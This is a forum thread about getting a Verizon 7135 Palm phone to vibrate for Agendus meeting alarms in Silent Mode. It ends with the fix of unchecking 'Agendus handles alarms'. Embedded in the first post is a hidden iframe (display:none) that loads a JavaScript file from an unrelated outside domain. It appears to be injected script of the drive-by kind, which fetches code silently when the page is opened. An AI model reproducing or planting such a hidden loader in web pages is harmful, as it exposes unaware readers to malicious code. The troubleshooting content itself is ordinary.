+ Reply to Thread

Meeting alerts in Silent Mode

Wondering if anyone else has solved a similar problem: I just received and re-setup a Verizon 7135 running 29/44 that was a replacement for the initial model. I am running Agendus Pro 6.14 and I have several meetings scheduled with alarms on. On my old 7135, when I set the phone to Silent Mode, the meeting alarms would automatically vibrate instead of sound. With the new phone in Silent Mode, I get no vibrate alert. Anyone know of a way around this??

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I never get vibrate when I have alarms in silent mode, just notification on the screen...so it sounds like something in your settings is different on the new phone (and mine). Have you checked the different sound sprefs?

Have tried them all...

I've tried all Silent Mode settings....

According to the Help screen, when in Silent Mode/vibrate all incoming calls and alerts will cause the phone to vibrate, which is what used to happen on my old 7135 (B4 29/44 upgrade).

Still looking for an answer...

Re: Have tried them all...

Originally posted by iamjgee
    I've tried all Silent Mode settings....

According to the Help screen, when in Silent Mode/vibrate all incoming calls and alerts will cause the phone to vibrate, which is what used to happen on my old 7135 (B4 29/44 upgrade).

Still looking for an answer...
    does Agendus have the option (like Datebk5) to either play it's own alarms or let the Palm OS handle the alarms? If so, you need to let palmOS handle the alarms to get the 7135 to vibrate for alarms.

Alan

Agendus has no option

Agendus appears to let the phone handle the alarms already, since there is no choice, and the alarm sounds are the same as the phone choices. Also, I was running the same Agendus version on my old 7135 when the vibrate alarm did work.

MINE IS NOT UPDATED. I HAVE 23/36.WHEN ANY ALARM IS SET TO GO OFF MINE WILL VIBRATE IN SILENT MODE. I USE SILENT MODE WHILE I'M AT WORK. WONDER IF IT HAS SOMETHING TO DO WITH NEW FIRMWARE?

maybe a hack?

I'm using agendus 6.14 and my firmware is 24/38 and I've never gotten an alarm vibrate for me. I was wondering if you have tech sounds or any other sound hacks on your system that might effect it.

On a whim, just tested to see if the native 7135 Datebook alarm would vibrate in Silent Mode, and it does. This must have something to do with Agendus or one of my other progs. Will do a hard reset and reinstall one-by-one, unless anyone has a better solution??

iamjgee;

Elsewhere on this forum I did a review of Agendus. While I did not check out all the Agendus features, one thing I was able to determine is the current version of Agendus creates its own database and does not seem to interact with the native application databases.

That being the case, Agendus does not use the native apps to trigger alarms, silent or othewise. This does not explain why the alarms worked before your upgrade and do not now, but I determined that alarms set in the native calendar app did not trigger alarms in Agendus (and vice versa.)

I seem to recall that the Agendus website states Agendus creates a separate database for calendar features and does not react with the native app.

Agendus is a powerful contact manager but basically renderes the native calendar useless.

Hope this helps, bcottun.
    bcottun

By unchecking the box "Agendus handles alarms" in Agendus 9.02, I was able to get the vibrate functionality for meeting alarms. As I unchecked that box, Agendus warned me that I would lose the alarms for todos and calls, since my device had no facility for doing so (but I don't care about those, anyway).